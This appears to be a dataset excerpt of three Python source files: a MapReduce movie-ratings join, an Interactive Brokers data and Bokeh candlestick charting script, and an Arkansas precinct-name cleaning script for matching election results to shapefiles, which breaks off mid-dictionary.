{"seq_id":"628061639","text":"import MapReduce\nimport sys\nimport itertools\n\"\"\"\nMapReduce program to join two tables \n\"\"\"\n\nmr = MapReduce.MapReduce()\n\ndef mapper(record):\n\trelationName=record[0]\n\tif relationName=='MovieNames':\n\t\tkey=record[2]\n\t\tdel record[0]\n\t\tnewValue=('MovieNames',record)\n\telif 
relationName=='MovieRatings':\n\t\tkey=record[1]\n\t\tdel record[0]\n\t\tnewValue=('MovieRatings',record)\n\tmr.emit_intermediate(key,newValue)\n\ndef reducer(key, list_of_values):\n\t# find the single MovieNames row for this join key\n\tnames_row = None\n\tfor value in list_of_values:\n\t\tif value[0]=='MovieNames':\n\t\t\tnames_row = value[1]\n\tavg = 0.0\n\tcount = 0\n\tfor value in list_of_values:\n\t\tif value[0]=='MovieRatings':\n\t\t\tcount += 1\n\t\t\tavg += value[1][2]\n\t\t\t# emit a fresh joined row; extending names_row in place would\n\t\t\t# leak earlier ratings into later output rows\n\t\t\tmr.emit(names_row + value[1])\n\tmr.emit((names_row[0], avg/count))\n\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"MapReduce/relational_join.py","file_name":"relational_join.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"606279981","text":"import time\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom ib_insync import *\n\nimport bokeh\nbokeh.sampledata.download()\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.layouts import gridplot\nfrom bokeh.sampledata.stocks import MSFT\nfrom bokeh.models import HoverTool\nfrom math import pi\n\ndef Ibconnect(): # check the network connection\n for i in range(0, 30, 1):\n try:\n b = ib.connect('127.0.0.1', 7497, clientId=i, timeout=0.2) # 0.2s timeout so a failed attempt moves on to the next clientId quickly\n # print(b)\n except:\n print('Connection attempt failed: clientId=%s' % (i))\n else: # connected\n # time.sleep(0.3) # wait for the probe connection to time out, then reconnect\n for j in range(i + 1, 30, 1): # establish a fresh connection\n try:\n b = ib.connect('127.0.0.1', 7497, clientId=i, timeout=0) # the 0.2s probe timeout is too short, so reconnect without it so later calls work normally\n except:\n print('Connection attempt failed: clientId=%s' % (i))\n\n else:\n print('Connected: clientId=%s' % (j))\n return True\ndef Get_Data(contract, dur, barsize, endTime):\n '''Without an end time'''\n # Price_Ag = ib.reqHistoricalData(\n # contract, endDateTime='', durationStr=dur,\n # barSizeSetting=barsize, whatToShow='MIDPOINT', useRTH=False)\n '''With an end time'''\n Price_Ag = ib.reqHistoricalData(\n contract, endDateTime=endTime, durationStr=dur,\n barSizeSetting=barsize, whatToShow='MIDPOINT', useRTH=False)\n\n df = util.df(Price_Ag)\n return df\n\nif __name__ == '__main__':\n '''\n durationStr: Time span of all the bars. Examples:\n '60 S', '30 D', '13 W', '6 M', '10 Y'.\n barSizeSetting: Time period of one bar. 
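As an aside on relational_join.py above, a minimal framework-free sketch of the same reduce-side join and per-key average; the sample rows are made up, and mr.emit is replaced by plain Python collections:\nnames = {1: 'Alien', 2: 'Aliens'} # movie_id -> title\nratings = [(1, 4.5), (1, 3.0), (2, 5.0)] # (movie_id, stars)\n# join: one output row per rating, like mr.emit(names_row + value[1])\njoined = [(mid, names[mid], stars) for mid, stars in ratings]\n# per-movie average, like the final mr.emit((names_row[0], avg/count))\nfrom collections import defaultdict\nsums = defaultdict(lambda: [0.0, 0])\nfor mid, stars in ratings:\n sums[mid][0] += stars\n sums[mid][1] += 1\naverages = {mid: s / c for mid, (s, c) in sums.items()}\nassert averages[1] == 3.75 and averages[2] == 5.0\n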
Must be one of:\n '1 secs', '5 secs', '10 secs', '15 secs', '30 secs',\n '1 min', '2 mins', '3 mins', '5 mins', '10 mins', '15 mins',\n '20 mins', '30 mins',\n '1 hour', '2 hours', '3 hours', '4 hours', '8 hours',\n '1 day', '1 week', '1 month'.\n '''\n dur = '1 D'\n barsize1 = '1 min'\n barsize2 = '10 mins'\n endtime = ''\n # endtime = '20201103 12:00:00'\n # dur2 = '5 D'\n # barsize2 = '10 mins'\n # endtime2 = ''\n # endtime2 = '20200405 00:00:00'\n\n now = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n output_file(\"log_lines_%s.html\"% (str(now)[0:17]))\n\n df=pd.DataFrame(MSFT)[:50]\n df['date']=pd.to_datetime(df['date'])\n inc=df.close>df.open\n dec=df.open>df.close\n open=np.array(df['open'])\n opem=open.tolist()\n w=23*60*3000 # one day's span expressed in milliseconds\n # toolbar\n # build the hover tooltip with custom labels\n hover = HoverTool(tooltips=[\n (\"index\", \"$index\"),\n (\"open\", \"@opem\"),\n (\"high\", \"@high\"),\n (\"low\", \"@df.low\"),\n (\"close\", \"@df.close\"),\n (\"(x,y)\", \"($x, $y)\"),\n ])\n # what the labels display:\n # $index: computed automatically -> row index\n # $x: computed automatically -> x value\n # $y: computed automatically -> y value\n # @A: shows the matching field value from the ColumnDataSource\n TOOLS=[hover,'crosshair,pan,wheel_zoom,box_zoom,zoom_in, xzoom_in, yzoom_in,zoom_out, xzoom_out, yzoom_out,reset,save']\n TOOLTIPS=[(),(),]\n # canvas\n # opts=dict(plot_width=1000,plot_height=50)\n p=figure(x_axis_type='datetime',tools=TOOLS,plot_width=1000,plot_height=650,title='Price',toolbar_location=\"below\",\n toolbar_sticky=False)\n\n # toolbar_location options: \"above\", \"below\", \"left\", \"right\"\n # other settings\n\n p.xaxis.major_label_orientation=pi/4\n p.grid.grid_line_alpha=0.3\n # draw\n p.segment(df.date,df.high,df.date,df.low,color='black') # high-low whiskers\n p.vbar(df.date[inc],w,df.open[inc],df.close[inc],fill_color='#F2583E',line_color='black')\n p.vbar(df.date[dec], w, df.open[dec], df.close[dec], fill_color='#D5E1DD', line_color='black')\n # p.line(x=df.date,y=df.high,legend='A',line_width=2)\n # show the result\n show(p)\n\n","sub_path":"tset2.py","file_name":"tset2.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"449382142","text":"import geopandas as gpd\nimport pandas as pd\n\nshp_path = \"/Users/hopecj/projects/AR/Shapefiles/AR Precincts 10_11_2019/ELECTION_PRECINCTS.shp\"\nelec_path = \"/Users/hopecj/projects/gerryspam/AR/AR_G18.csv\"\n\nelec_df = pd.read_csv(elec_path)\nshp_df = gpd.read_file(shp_path)\nshp_df = shp_df[[\"state_fips\", \"county_fip\",\n \"county_nam\", \"precinct\", \"geometry\"]]\n\n\"\"\"\ngeneral helper functions for all counties\n\"\"\"\n\n\ndef chop_five(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=5)\n\n\n\"\"\"\ncounty-specific cleaning functions\n\"\"\"\n\n\ndef arkansas(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace({\n \"DeWitt 1\": \"Dewitt ward 1\",\n \"Dewitt 2\": \"Dewitt ward 2\",\n \"Dewitt 3\": \"Dewitt WARD 3\",\n \"Stuttgart 1\": \"Stuttgart ward 1\",\n \"Stuttgart 2\": \"Stuttgart ward 2\",\n \"Stuttgart 3\": \"Stuttgart ward 3\",\n })\n\n\ndef ashley(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace({\n \"Crossett Ward 1\": \"CW1\",\n \"Crossett Ward 2\": \"CW2\",\n \"Crossett Ward 3\": \"CW3\",\n \"Cross Roads\": \"CROSSROADS\",\n \"Fountain Hill City\": \"FH CITY\",\n \"Fountain Hill Rural\": \"FH RURAL\",\n \"Hamburg Ward 1\": \"HW1\",\n \"Hamburg Ward 2\": \"HW2\",\n \"Hamburg Ward 3\": \"HW3\",\n \"Mt. 
Zion\": \"MT ZION\",\n \"North Crossett East\": \"NCE\",\n \"North Crossett West\": \"NCW\",\n \"Snyder / Trafalgar\": \"SNY/TRA\",\n \"VO - Tech\": \"VOTECH\",\n \"West Crossett Rural\": \"WCR\",\n })\n\ndef baxter(dat):\n dat[\"prec\"] = dat[\"prec\"] + \"b\"\n\n\ndef benton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Precinct 01\": \"Precinct 1\",\n \"Precinct 02\": \"Precinct 2\",\n \"Precinct 03\": \"Precinct 3\",\n \"Precinct 04\": \"Precinct 4\",\n \"Precinct 05\": \"Precinct 5\",\n \"Precinct 06\": \"Precinct 6\",\n \"Precinct 07\": \"Precinct 7\",\n \"Precinct 08\": \"Precinct 8\",\n \"Precinct 09\": \"Precinct 9\",\n })\n\ndef boone(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Diamond City (12)\": \"District 12\",\n })\n\ndef bradley(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Warren Ward 1\": \"Ward 1\",\n \"Warren Ward 2\": \"Ward 2\",\n \"Warren Ward 3\": \"Ward 3\"})\n\n\ndef carroll(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Berryville Ward 1\": \"BV Ward 1\",\n \"Berryville Ward 2\": \"BV Ward 2\",\n \"Eureka Springs Ward 1\": \"ES Ward 1\",\n \"Eureka Springs Ward 2\": \"ES Ward 2\",\n \"Eureka Springs Ward 3\": \"ES Ward 3\",\n \"Green Forest Ward 1\": \"GF Ward 1\",\n \"Green Forest Ward 2\": \"GF Ward 2\",\n \"North East Hickory\": \"NE Hickory\",\n \"Northwest Hickory\": \"NW Hickory\",\n \"Long Creek\": \"Lng Crk\",\n \"SW & SE Hickory\": \"SW/SE HICKORY\",\n })\n\n\ndef chicot(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" Carlton\": \"Carlton 1 & 2\",\n \" Carlton 2\": \"Carlton 1 & 2\",\n })\n\ndef clark(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Central 1\": \"Central\",\n \"Curtis 1\": \"Curtis\",\n \"East County 1\": \"East County\",\n \"Gum Springs Outside 1\": \"Gum Springs Outside\",\n \"Gum Springs 1\": \"Gum Springs Inside\",\n \"Gurdon Gen 1\": \"Gurdon General\",\n \"Hollywood 1\": \"Hollywood\",\n \"North East County\": \"Northeast County\",\n \"Okolona City 1\": \"Okolona City\",\n \"South County 1\": \"South County\",\n \"West County 1\": \"West County\",\n \"Whelen Springs 1\": \"Whelen Springs\",\n })\n\n\ndef clay(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bennett & Lemmons\": \"Bennett and Lemmons\",\n \"E Oak Bluff & Blue Cane\": \"East Oak Bluff & Blue Cane\",\n \"Liddell & chalk Bluff\": \"Liddell & Chalk Bluff\",\n \"Cleveland & N Kilgore\": \"N Kilgore & Cleveland\",\n \"North St Francis\": \"North St. Francis\",\n \"Gleghorn & S Kilgore\": \"S Kilgore & Gleghorn\",\n \"South St Francis\": \"South St. Francis\",\n })\n \ndef cleveland(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" Kingsland Out\": \"Kingsland outside\", })\n\n\n\n\ndef columbia(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Taylor City\": \"Taylor\", \"Waldo City\": \"Waldo\"})\n\n\ndef conway(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"St Vincent\": \"St. 
Vincent\", \n \"Lick Mountain\": \"Lick Mtn.\",\n \"Morrilton Ward 1\": \"Ward 1\",\n \"Morrilton Ward 2\": \"Ward 2\",\n \"Morrilton Ward 3\": \"Ward 3\",\n \"Morrilton Ward 4\": \"Ward 4\",\n \"nifee City\": \"menifee city\",\n })\n\n\ndef crawford(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Alma 01\": \"Alma 1\",\n \"Alma 02\": \"Alma 2\",\n \"Alma 03\": \"Alma 3\",\n \"Alma 04\": \"Alma 4\",\n \"Cove City\": \"Cove City CSD\",\n \"Lee Creek\": \"Lee Creek CSD\",\n \"Mulberry 01\": \"Mulberry 1\",\n \"Mulberry 02\": \"Mulberry 2\",\n \"Mulberry 03\": \"Mulberry 3\"})\n\n\ndef cross(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bay Village / Birdeye\": \"Bay Village, Birdeye\",\n \"Cherry Valley\": \"Cherry Valley City\",\n \"Tyronza / Twist\": \"Tyronza, Twist\",\n \"Wynne Ward 1\": \"WYNNE WARD 1\",\n \"Wynne Ward 2\": \"WYNNE WARD 2\",\n \"Wynne Ward 3\": \"WYNNE WARD 3\",\n \"Wynne Ward 4\": \"WYNNE WARD 4\",\n \"Wynne Ward 5\": \"WYNNE WARD 5\"})\n\ndef dallas(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\" District 5 -\": \"district 5\", \n })\n\ndef desha(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Bowie W1\": \"Bowie 1\",\n \"Bowie W2\": \"Bowie 2\",\n \"Bowie W3\": \"Bowie 3\",\n \"Mitcheville\": \"Mitchellville\",\n \"Rand W1\": \"Randolph 1\",\n \"Rand W2\": \"Randolph 2\",\n \"Rand W3\": \"Randolph 3\",\n \"Rand W4\": \"Randolph 4\",\n \"Rand Rural\": \"Randolph Rural\",\n \"Silver Lake\": \"Silverlake\",\n })\n\n\ndef drew(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Mar N Box 1\": \"MN BOX 1 - RH Cumb. Presb\",\n \"Mar N Box 2\": \"MN Box 2 - RH Baptist Chu\",\n \"Marion South\": \"Marion South - Shady Grov\",\n })\n\n\ndef faulkner(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Wilson 35\": \"35 Wilson\",\n \"West Cadron 14\": \"14 W Cadron\",\n \"Walker 38\": \"38 Walker\",\n \"Vilonia City 21\": \"21 Vilonia\",\n \"Union 37\": \" 37 Union\",\n \"Pine Mt 36\": \"36 Pine Mt.\",\n \"Palarm 39\": \" 39 Palarm\",\n \"Newton 34\": \"34 Newton\",\n \"Mountain 32\": \"32 Mountain\",\n \"Mount Vernon 33\": \"33 Mt. 
Vernon\",\n \"Matthews 31\": \"31 Matthews\",\n \"Harve 30\": \"30 Harve\",\n \"Hardin Rural 28\": \"28 Hardin\",\n \"Hardin City West (GB) 55\": \"55.01 Hardin GB West\",\n \"Hardin City East (GB) 29\": \"29.01 Hardin GB East\",\n \"Enola 27\": \"27 Enola\",\n \"East Fork 26\": \"26 East Fork\",\n \"Eagle 25\": \"25 Eagle\",\n \"E Cadron C 48\": \"48 E Cadron C\",\n \"E Cadron B 13\": \"13 E Cadron B\",\n \"E Cadron A 12\": \"12 E Cadron A\",\n \"Danley Rural 23\": \"23 Danley\",\n \"Danley City (Mayflower) 24\": \"24 Mayflower\",\n \"Cypress Rural 22\": \"22 Cypress\",\n \"Clifton 19\": \"19 Clifton\",\n \"California 18\": \"18 CA\",\n \"Bristol 17\": \"17 Bristol\",\n \"Benton 16\": \"16 Benton\",\n \"Benedict 15\": \"15 Benedict\",\n \"4f Conway City 05\": \"05 4F\",\n \"4e Conway City 03\": \"03.01 4E\",\n \"4d Conway City 04\": \"04.01 4D\",\n \"4c Conway City 11\": \"11 4C\",\n \"4b Conway City 02\": \"02 4B\",\n \"4a Conway City 01\": \"01.01 4A\",\n \"3g Conway City 54\": \"54 3G\",\n \"3f Conway City 53\": \"53 3F\",\n \"3e Conway City 45\": \"45.01 3E\",\n \"3d Conway City 50\": \"50.01 3D\",\n \"3c-West Conway City 46\": \"46 3C-W\",\n \"3c-East Conway City 09\": \"09 3C-E\",\n \"3b Conway City 08\": \"08 3B\",\n \"3a Conway City 10\": \"10 3A\",\n \"2c Conway City 49\": \"49 2C\",\n \"2b Conway City 06\": \"06.01 2B\",\n \"2a Conway City 07\": \"07 2A\",\n \"1e-West Conway City 44\": \"44 1E-W\",\n \"1e-East Conway City 43\": \"43 1E-E\",\n \"1c-South Conway City 42\": \"42 1C-S\",\n \"1c-North Conway City 41\": \"41 1C-N\",\n })\n\n\ndef franklin(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"7-C (Etna)\": \"7-C Etna\",\n \"6-B (Altus City)\": \"6-B Altus City\",\n \"7-A (Cecil)\": \"7-A Cecil\",\n \"3-E (Watalula)\": \"3-E Watalula\",\n \"2-D (Wallace/Ivy)\": \"2-D Wallace/Ivy\",\n \"1-B (Oz Wd 3)\": \"1-B Ozark Wd. 3\",\n \"2-A (Oz Wd 2)\": \"2-A Ozark Wd. 2\",\n \"3-F (Mountain)\": \"3-F Mountain\",\n \"5-A (Wallace/Ivy)\": \"5-A Wallace/Ivy\",\n \"9-A (Charleston Wd 2)\": \"9-A Charleston Wd. 2\",\n \"3-A (Lonelm/Cravens)\": \"3-A Lone Elm/Cravens\",\n \"8-A (Branch City)\": \"8-A Branch City\",\n \"4-B (Watalula)\": \"4-B Watalula\",\n \"3-D (Jethro)\": \"3-D Jethro\",\n \"3-B (Fern)\": \"3-B Fern\",\n \"7-D (Donald Rural)\": \"7-D Donald\",\n \"3-C (Boston)\": \"3-C Boston\",\n \"8-B (Charleston Wd 1)\": \"8-B Charleston Wd. 1\",\n \"8-D (Vesta)\": \"8-D Vesta\",\n \"6-D (Weiderkehr Village)\": \"6-D W.V. City\",\n \"8-F (Cecil)\": \"8-F Cecil\",\n \"5-C (Webb City)\": \"5-C Webb City\",\n \"2-C (Lonelm/Cravens)\": \"2-C Lone Elm/Cravens\",\n \"4-C (WV Rural)\": \"4-C W-V Rural\",\n \"6-A (Altus Rural)\": \"6-A Altus Rural\",\n \"6-C (Denning)\": \"6-C Denning City\",\n \"4-D (Oz Rural)\": \"4-D Ozark Rural\",\n \"4-A (Philpot)\": \"4-A Philpot\",\n \"8-E (Donald Rural)\": \"8-E Donald\",\n \"9-C (Charleston Rural)\": \"9-C Charleston Rural\",\n \"7-B (Webb City)\": \"7-B Webb City\",\n \"8-G (Donald Rural)\": \"8-G Donald\",\n \"1-A (Oz Wd 1)\": \"1-A Ozark Wd.1\",\n \"5-B (Oz Rural)\": \"5-B Ozark Rural\",\n \"2-B (Oz Rural)\": \"2-B Ozark Rural\",\n \"9-B (Charleston Wd 3)\": \"9-B Charleston Wd. 3\",\n \"2-E (Oz Wd 3)\": \"2-E Ozark Wd. 3\",\n \"1-C (Oz WD 2)\": \"1-C Ozark Wd.2\",\n \"8-C (Charleston Rural)\": \"8-C Charleston Rural\",\n })\n\n\ndef fulton(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"MS - Afton\": \"MAMMOTH SPRING/AFTON\",\n \"Fulton - Mt. 
Calm\": \"FULTON/MT CALM\"\n })\n dat[\"prec\"] = dat[\"prec\"].str.replace(\" - \", \"/\")\n\ndef garland(dat): \n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n\n\ndef greene(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Delaplaine - Jones\": \"Delaplaine-Jones\",\n \"Lafe - Breckenridge\": \"Lafe-Breckenridge\",\n \"Marmaduke - Hurricane\": \"Marmaduke-Hurricane\",\n \"Oak Grove - Union\": \"Oak Grove-Union\",\n })\n\n\ndef hempstead(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=3)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Cross Roads\": \"Crossroads\",\n })\n\ndef hotspring(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Friendship City\": \"Friendship\",\n \"Malvern W-1\": \"ward 1\",\n \"Malvern W-2\": \"ward 2\",\n \"Malvern W-3\": \"ward 3\",\n \"Malvern W-4\": \"ward 4\",\n }\n )\n\ndef howard(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"ineral Spring 3\": \"Mineral spring 3\",\n }\n )\n\ndef independence(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Big Bottom / Wycough / Logan\": \"Big Bottom Wycough Logan\",\n \"Black River / Marshall\": \"Black River/Marshall\",\n \"Cushman / Union\": \"Cushman/Union\",\n \"Greenbrier - Desha\": \"Greenbrier-Desha\",\n \"Greenbrier - Jamestown\": \"Greenbrier-Jamestown\",\n \"Greenbrier - Locust Grove\": \"Greenbrier-Locust Grove\",\n })\n\n\ndef izard(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Calico Rock Ward 1\": \"CALICO ROCK - WARD 1\",\n \"Calico Rock Ward 2\": \"CALICO ROCK - WARD 2\",\n \"Calico Rock Ward 3\": \"CALICO ROCK - WARD 3\",\n \"Calico Rock Ward 4\": \"CALICO ROCK - WARD 4\",\n \"Horseshoe Bend Ward 1\": \"HORSESHOE BEND - WARD 1\",\n \"Horseshoe Bend Ward 2\": \"HORSESHOE BEND - WARD 2\",\n \"Horseshoe Bend Ward 3\": \"HORSESHOE BEND - WARD 3\",\n \"Horseshoe Bend Ward 4\": \"HORSESHOE BEND - WARD 4\",\n \"Melbourne Ward 1\": \"MELBOURNE - WARD 1\",\n \"Melbourne Ward 2\": \"MELBOURNE - WARD 2\",\n \"Melbourne Ward 3\": \"MELBOURNE - WARD 3\",\n \"Melbourne Ward 4\": \"MELBOURNE - WARD 4\",\n \"Mt. Pleasant City\": \"MOUNT PLEASANT CITY\",\n \"Mt. 
Pleasant Rural\": \"MOUNT PLEASANT RURAL\",\n })\n\n\ndef jackson(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Crossroads -37\": \"CROSSROADS-37\",\n \"Gourdneck - Citizenship\": \"GOURDNECK-CITIZENSHIP\",\n \"Newport Ward 1-A\": \"Newport W 1-A\",\n \"Newport Ward 1-B\": \"Newport W 1-B\",\n \"Newport Ward 2-A\": \"Newport W 2-A\",\n \"Newport Ward 3-C\": \"Newport W 3-A-C\",\n \"Newport Ward 4-A\": \"Newport W 4-A\",\n \"Newport Ward 4-B\": \"Newport W 4-B\",\n \"Newport Ward 2-C\": \"Newport W 2-C\",\n \"Newport Ward 2-B\": \"Newport W 2-B\",\n \"Newport Ward 3-B\": \"Newport W 3-B\",\n \"Penninghton Balch\": \"PENNINGTON BALCH\",\n })\n\ndef lafayette(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Stamps Ward 1, Prec 1\": \"Stamps Ward 1, Pct 1\",\n \"Stamps Ward 1, Prec 2\": \"Stamps Ward 1, Pct 2\",\n \"Bradley City\": \"Bradley\",\n \"Buckner City\": \"Buckner\",\n \"Lewisville Out\": \"Lewisville Ward 1 (Out)\",\n \"Stamps W1 P2 Out\": \"Stamps Ward 1, Pct 2 (Out)\",\n \"Stamps W2 Out\": \"Stamps Ward 2 (Out)\",\n \"Buckner Out\": \"Buckner (Out)\",\n \"Bradley Out\": \"Bradley (Out)\",\n })\n\n\ndef lawrence(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Boas #1\": \"Boas 1\",\n \"Boas #2\": \"Boas 2\",\n \"Boas #3\": \"Boas 3\",\n \"Campbell #1\": \"Campbell 1\",\n \"Campbell #2\": \"Campbell 2\",\n \"Campbell #3\": \"Campbell 3\",\n \"Campbell #4\": \"Campbell 4\",\n \"Reeds Creek Saffell\": \"Reed's Creek Saffell\",\n \"Reeds Creek Strawberry\": \"REED'S CREEK STRAWBERRY\",\n })\n\n\ndef lee(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Precinct 1\": \"JP01\",\n \"Precinct 2\": \"JP02\",\n \"Precinct 3\": \"JP03\",\n \"Precinct 4\": \"JP04\",\n \"Precinct 5\": \"JP05\",\n \"Precinct 6\": \"JP06\",\n \"Precinct 7\": \"JP07\",\n \"Precinct 8\": \"JP08\",\n \"Precinct 9\": \"JP09\",\n })\n\n\ndef lincoln(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"E Lincoln Co FD\": \"SE Lincoln Co FD\",\n \"ells Bayou\": \"Wells Bayou/FS\",\n \"Tarry\": \"Bar/Tarry\",\n \"Yorktown\": \"Bar/Yorktown\",\n \"Lone Pine / Garnett\": \"Lone Pine/Garnett\",\n \"Lone Pine / Mt Home\": \"Lone Pine/Mt. 
Home\",\n \"Owen / Glendale\": \"Owen/Glendale\",\n \"Owen / Palmyra\": \"Owen/Palmyra\",\n \"Wells Bayou\": \"Wells Bayou/FS\",\n \"Grady City W1 & W2\": \"Grady City W1& W2\",\n \"ould City W1\": \"Gould City W1\",\n })\n\n\ndef littleriver(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Arden Township\": \"Arden\",\n \"Arkinda Township\": \"Arkinda\",\n \"Burke Township\": \"Burke\",\n \"Caney Township\": \"Caney\",\n \"Cleveland Township\": \"Cleveland\",\n \"Franklin Township\": \"Franklin\",\n \"Jackson Township\": \"Jackson\",\n \"Jefferson Township\": \"Jefferson\",\n \"Jewell Township\": \"Jewell\",\n \"Johnson Township\": \"Johnson\",\n \"Lick Creek Township\": \"Lick Creek\",\n \"Little River Township\": \"Little River\",\n \"Red River Township\": \"Red River\",\n \"Wallace / Richland\": \"Wallace/Richland\",\n })\n\n\ndef logan(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=6)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Sht Mtn WD 1\": \"Short Mtn Ward 1\",\n \"Sht Mtn WD 2\": \"Short Mtn Ward 2\",\n \"Sht Mtn WD 3\": \"Short Mtn Ward 3\",\n \"Sht Mtn WD 4\": \"Short Mtn Ward 4\",\n \"Blue Mountain City\": \"Blue Mtn City\",\n \"Blue Mountain Rural\": \"Blue Mtn Rural\",\n \"Boone WD 1\": \"Boone Ward 1\",\n \"Boone WD 2\": \"Boone Ward 2\",\n \"Boone WD 3\": \"Boone Ward 3\",\n \"Boone WD 4\": \"Boone Ward 4\",\n })\n\n\ndef lonoke(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"05 - Cabot City Ward 1\": \"05 - Cabot City W/1\",\n \"06 - Cabot City Ward 2\": \"06 - Cabot City W/2\",\n \"07 - Cabot City Ward 3\": \"07 - Cabot City W/3\",\n \"08 - Cabot City Ward 4\": \"08 - Cabot City W/4\",\n \"13 - Carlisle TWP\": \"13 - Carlisle Twp.\",\n \"34 - Lonoke City Ward 1\": \"34 - Lonoke City W/1\",\n \"35 - Lonoke City Ward 2\": \"35 - Lonoke City W/2\",\n \"36 - Lonoke City Ward 3\": \"36 - Lonoke City W/3\",\n \"37 - Lonoke City Ward 4\": \"37 - Lonoke City W/4\",\n \"42 - Prairie TWP\": \"42 - Prairie Twp.\",\n \"45 - Totten TWP\": \"45 - Totten Twp.\",\n \"46 - Walls TWP\": \"46 - Walls Twp.\",\n \"47 - Ward City Ward 1\": \"47 - Ward City W/1\",\n \"48 - Ward City Ward 2\": \"48 - Ward City W/2\",\n \"49 - Ward City Ward 3\": \"49 - Ward City W/3\",\n \"51 - Williams TWP\": \"51 - Williams Twp.\",\n \"53 - Lonoke City Ward 5\": \"53 - Lonoke City W/5\",\n \"54 - Lonoke City Ward 6\": \"54 - Lonoke City W/6\",\n \"55 - Lonoke City Ward 7\": \"55 - Lonoke City W/7\",\n \"55 - Lonoke City Ward 8\": \"55 - Lonoke City W/8\",\n \"01 - Allport City\": \"01- Allport City\",\n \"11 - Carlisle City Ward 2\": \"11 -Carlisle City Ward 2\",\n \"19 - England City Ward 3\": \"19- England City Ward 3\",\n \"56 - Lonoke City Ward 8\": \"56 - Lonoke City W/8\",\n })\n\n\ndef marion(dat):\n dat[\"prec\"] = \"P00\" + dat[\"prec\"].str.slice(start=9)\n\n\ndef miller(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Hickory St\": \"Hickory Street\",\n \"Hickory St South\": \"Hickory Street South\",\n \"Ozan Inghram\": \"Ozan\",\n })\n\n\ndef monroe(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"Duncan Township\": \"duncan\",\n \"Holly Grove Township\": \"holly grove\",\n \"Keevil Township\": \"keevil\",\n })\n\ndef montgomery(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\"MOUNT IDA - IN\": \"Mount Ida - Inside\",\n \"MOUNT IDA - OUT\": \"Mount Ida - Outside\",\n \"NORMAN - IN\": \"Norman - Inside\",\n \"NORMAN - OUT\": \"Norman - Outside\",\n \"ODEN - IN\": \"Oden - Inside\",\n \"ODEN - OUT\": \"Oden - Outside\",\n 
